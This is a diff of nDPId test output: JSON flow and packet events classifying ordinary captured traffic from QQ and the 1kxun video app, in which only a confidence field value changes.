00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1447,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385127293,"flow_last_seen":1654385127293,"flow_idle_time":7580000,"flow_min_l4_payload_len":270,"flow_max_l4_payload_len":270,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1654385127293,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"129.226.107.77","src_port":41134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1447,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1654385127293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":324,"pkt_l4_len":290,"thread_ts_msec":1654385127293,"pkt":"tKXvZygQnLbQ0+MzCABFAAE2ngNAAEAG62jAqAJ+geJrTaCuAFAAOroVfx7qtFAYAfaxfgAAR0VUIC9xcWNvbm5lY3RvcGVuL29wZW5hcGkvcG9saWN5X2NvbmY\/c3RhdHVzX29zPTExJnN0YXR1c192ZXJzaW9uPTMwJnN0YXR1c19tYWNoaW5lPXNka19ncGhvbmVfeDg2JnNka3A9YSZzZGt2PTMuMS4wLmxpdGUmYXBwaWQ9MTAwMjU4MTM1IEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IGNnaS5jb25uZWN0LnFxLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogQW5kcm9pZFNES18zMF9nZW5lcmljX3g4Nl9hcm1fMTENCg0K"} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1447,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385127293,"flow_last_seen":1654385127293,"flow_idle_time":7580000,"flow_min_l4_payload_len":270,"flow_max_l4_payload_len":270,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1654385127293,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"129.226.107.77","src_port":41134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"cgi.connect.qq.com","url":"cgi.connect.qq.com\/qqconnectopen\/openapi\/policy_conf?status_os=11&status_version=30&status_machine=sdk_gphone_x86&sdkp=a&sdkv=3.1.0.lite&appid=100258135","code":0,"content_type":"","user_agent":"AndroidSDK_30_generic_x86_arm_11"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1447,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385127293,"flow_last_seen":1654385127293,"flow_idle_time":7580000,"flow_min_l4_payload_len":270,"flow_max_l4_payload_len":270,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1654385127293,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"129.226.107.77","src_port":41134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"cgi.connect.qq.com","url":"cgi.connect.qq.com\/qqconnectopen\/openapi\/policy_conf?status_os=11&status_version=30&status_machine=sdk_gphone_x86&sdkp=a&sdkv=3.1.0.lite&appid=100258135","code":0,"content_type":"","user_agent":"AndroidSDK_30_generic_x86_arm_11"}} 00823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1654385127425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":330,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":330,"pkt_l4_len":296,"thread_ts_msec":1654385127425,"pkt":"nLbQ0+MztKXvZygQCABFAAE8FLJAADQGv1GhdQ0dwKgCfgBQuH6HV\/ck7YrZ+IAYAOvWowAAAQEICpcQ45e6xeF1SFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNToyNyBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogOQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KTGFzdC1Nb2RpZmllZDogTW9uLCAwMyBGZWIgMjAyMCAwNDoyODozNSBHTVQNCkVUYWc6ICI1ZTM3YTE3My05Ig0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KMWt4dW4uY29t"} 01075{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1654385127488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":518,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":518,"pkt_l4_len":484,"thread_ts_msec":1654385127488,"pkt":"nLbQ0+MztKXvZygQCABFAAH47MNAADEGquaB4mtNwKgCfgBQoK5\/Huq0ADq7I1AYAHt3UAAASFRUUC8xLjEgMzAyIE1vdmVkIFRlbXBvcmFyaWx5DQpTZXJ2ZXI6IHN0Z3cNCkRhdGU6IFNhdCwgMDQgSnVuIDIwMjIgMjM6MjU6MjcgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDEzNw0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KTG9jYXRpb246IGh0dHBzOi8vY2dpLmNvbm5lY3QucXEuY29tL3FxY29ubmVjdG9wZW4vb3BlbmFwaS9wb2xpY3lfY29uZj9zdGF0dXNfb3M9MTEmc3RhdHVzX3ZlcnNpb249MzAmc3RhdHVzX21hY2hpbmU9c2RrX2dwaG9uZV94ODYmc2RrcD1hJnNka3Y9My4xLjAubGl0ZSZhcHBpZD0xMDAyNTgxMzUNCg0KPGh0bWw+DQo8aGVhZD48dGl0bGU+MzAyIEZvdW5kPC90aXRsZT48L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+PGgxPjMwMiBGb3VuZDwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5zdGd3PC9jZW50ZXI+DQo8L2JvZHk+DQo8L2h0bWw+DQo="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385128878,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"flow_min_l4_payload_len":880,"flow_max_l4_payload_len":880,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":880,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1654385128878,"pkt":"tKXvZygQnLbQ0+MzCABFAAOkVoFAAEAGbxrAqAJ+oXUNHbiOAFDYbv67IGDcx4AYAfZ1TwAAAQEICrrF59eXEOkaR0VUIC92aWRlb19rYW5rYW5fdGFncy92Mi9hcGkvaG9tZVBhZ2VWaWRlb0NvbGxlY3Rpb25zL0hvbWVQYWdlQmFubmVycz9fYnJhbmQ9R29vZ2xlJl9tb2RlbD1zZGtfZ3Bob25lX3g4NiZfb3Y9QW5kcm9pZDExJl9jcHU9aTY4NiZfcmVzb2x1dGlvbj0xMDgwJTJDMTc5NCZfcGFja2FnZT1jb20uc2NlbmV3YXkua2Fua2FuJl92PTIuOC4yLjEmX2NoYW5uZWw9MWt4dW4mX2NhcnJpZXI9MzEwMjYwJl9hbmRyb2lkX2lkPWI5ZTI4Nzc2MzU0ZDI1OWUmX25ldHdvcms9d2lmaSZfYWlkPTVhYzZhMGZmLThkMTgtNDdiYy1hOTAyLTI4MTJjZjBjMjUxZSZfdWRpZD1lNmRiZDMwYi0zYjg0LTQ0YjQtOTc1MS02MzExNDhhM2VkZTkmJl9jb3VudHJ5PVVTJl9sb2NhbGU9ZW4mXz0xNjU0Mzg1MTI1IEhUVFAvMS4xDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ2xpZW50LUJyYW5kOiBHb29nbGUNCkNsaWVudC1EZXZpY2U6IHNka19ncGhvbmVfeDg2DQpDbGllbnQtT3M6IEFuZHJvaWQxMQ0KQ2xpZW50LUNwdTogaTY4Ng0KQ2xpZW50LVJlc29sdXRpb246IDEwODAsMTc5NA0KQ2xpZW50LVBhY2thZ2U6IGNvbS5zY2VuZXdheS5rYW5rYW4NCkNsaWVudC1WZXJzaW9uOiAyLjguMi4xDQpDbGllbnQtU291cmNlOiAxa3h1bg0KQ2xpZW50LVNpbTogMzEwMjYwDQpDbGllbnQtQW5kcm9pZElkOiBiOWUyODc3NjM1NGQyNTllDQpDbGllbnQtQ291bnRyeTogVVMNCkNsaWVudC1MYW5ndWFnZTogZW4NCkNsaWVudC1VaWQ6IGU2ZGJkMzBiLTNiODQtNDRiNC05NzUxLTYzMTE0OGEzZWRlOQ0KSG9zdDoga2Fua2FuLjFreHVuLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385128878,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"flow_min_l4_payload_len":880,"flow_max_l4_payload_len":880,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":880,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/video_kankan_tags\/v2\/api\/homePageVideoCollections\/HomePageBanners?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&&_country=US&_locale=en&_=1654385125","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385128878,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"flow_min_l4_payload_len":880,"flow_max_l4_payload_len":880,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":880,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/video_kankan_tags\/v2\/api\/homePageVideoCollections\/HomePageBanners?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&&_country=US&_locale=en&_=1654385125","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1451,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385128878,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"flow_min_l4_payload_len":871,"flow_max_l4_payload_len":871,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":871,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1451,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":937,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":937,"pkt_l4_len":903,"thread_ts_msec":1654385128878,"pkt":"tKXvZygQnLbQ0+MzCABFAAObJTNAAEAGoHHAqAJ+oXUNHbieAFDTi3nFmPV9m4AYAfZ1RgAAAQEICrrF59eXEOkZR0VUIC92aWRlb19rYW5rYW5fdGFncy92Mi9hcGkvbWVzc2FnZXM\/bWluX2lkPTAmYWNjZXNzX3Rva2VuPSZfYnJhbmQ9R29vZ2xlJl9tb2RlbD1zZGtfZ3Bob25lX3g4NiZfb3Y9QW5kcm9pZDExJl9jcHU9aTY4NiZfcmVzb2x1dGlvbj0xMDgwJTJDMTc5NCZfcGFja2FnZT1jb20uc2NlbmV3YXkua2Fua2FuJl92PTIuOC4yLjEmX2NoYW5uZWw9MWt4dW4mX2NhcnJpZXI9MzEwMjYwJl9hbmRyb2lkX2lkPWI5ZTI4Nzc2MzU0ZDI1OWUmX25ldHdvcms9d2lmaSZfYWlkPTVhYzZhMGZmLThkMTgtNDdiYy1hOTAyLTI4MTJjZjBjMjUxZSZfdWRpZD1lNmRiZDMwYi0zYjg0LTQ0YjQtOTc1MS02MzExNDhhM2VkZTkmJl9jb3VudHJ5PVVTJl9sb2NhbGU9ZW4mXz0xNjU0Mzg1MTI1IEhUVFAvMS4xDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ2xpZW50LUJyYW5kOiBHb29nbGUNCkNsaWVudC1EZXZpY2U6IHNka19ncGhvbmVfeDg2DQpDbGllbnQtT3M6IEFuZHJvaWQxMQ0KQ2xpZW50LUNwdTogaTY4Ng0KQ2xpZW50LVJlc29sdXRpb246IDEwODAsMTc5NA0KQ2xpZW50LVBhY2thZ2U6IGNvbS5zY2VuZXdheS5rYW5rYW4NCkNsaWVudC1WZXJzaW9uOiAyLjguMi4xDQpDbGllbnQtU291cmNlOiAxa3h1bg0KQ2xpZW50LVNpbTogMzEwMjYwDQpDbGllbnQtQW5kcm9pZElkOiBiOWUyODc3NjM1NGQyNTllDQpDbGllbnQtQ291bnRyeTogVVMNCkNsaWVudC1MYW5ndWFnZTogZW4NCkNsaWVudC1VaWQ6IGU2ZGJkMzBiLTNiODQtNDRiNC05NzUxLTYzMTE0OGEzZWRlOQ0KSG9zdDoga2Fua2FuLjFreHVuLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} -01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1451,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385128878,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"flow_min_l4_payload_len":871,"flow_max_l4_payload_len":871,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":871,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47262,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/video_kankan_tags\/v2\/api\/messages?min_id=0&access_token=&_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&&_country=US&_locale=en&_=1654385125","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104381217,"flow_last_seen":1470104426277,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399652,"flow_last_seen":1470104400059,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104376017,"flow_last_seen":1470104433238,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430884,"flow_last_seen":1470104431294,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8554,"flow_avg_l4_payload_len":611,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8214,"flow_avg_l4_payload_len":586,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} +01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1451,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385128878,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"flow_min_l4_payload_len":871,"flow_max_l4_payload_len":871,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":871,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47262,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/video_kankan_tags\/v2\/api\/messages?min_id=0&access_token=&_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&&_country=US&_locale=en&_=1654385125","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104381217,"flow_last_seen":1470104426277,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399652,"flow_last_seen":1470104400059,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104376017,"flow_last_seen":1470104433238,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430884,"flow_last_seen":1470104431294,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8554,"flow_avg_l4_payload_len":611,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8214,"flow_avg_l4_payload_len":586,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 